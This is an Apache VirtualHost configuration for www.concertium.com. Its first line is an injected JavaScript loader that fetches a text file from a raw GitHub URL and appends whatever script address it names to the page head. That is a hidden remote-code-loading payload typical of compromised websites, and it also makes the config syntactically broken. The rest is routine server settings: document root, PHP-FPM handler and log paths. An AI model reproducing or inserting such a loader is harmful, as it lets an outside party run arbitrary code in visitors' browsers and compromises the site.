;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
<IfModule mod_ssl.c>
<VirtualHost *:80>
ServerAdmin sgchowdhury@concertium.com
DocumentRoot /var/www/concertium.com/public_html
ServerName www.concertium.com
<Directory /var/www/concertium.com/public_html/>
Options +FollowSymlinks
AllowOverride All
Require all granted
</Directory>
<FilesMatch \.php$>
SetHandler "proxy:unix:/var/run/php/concertium.com.sock|fcgi://localhost/"
</FilesMatch>
ErrorLog ${APACHE_LOG_DIR}/concertium.com-error.log
CustomLog ${APACHE_LOG_DIR}/concertium.com-access.log combined
</VirtualHost>
</IfModule>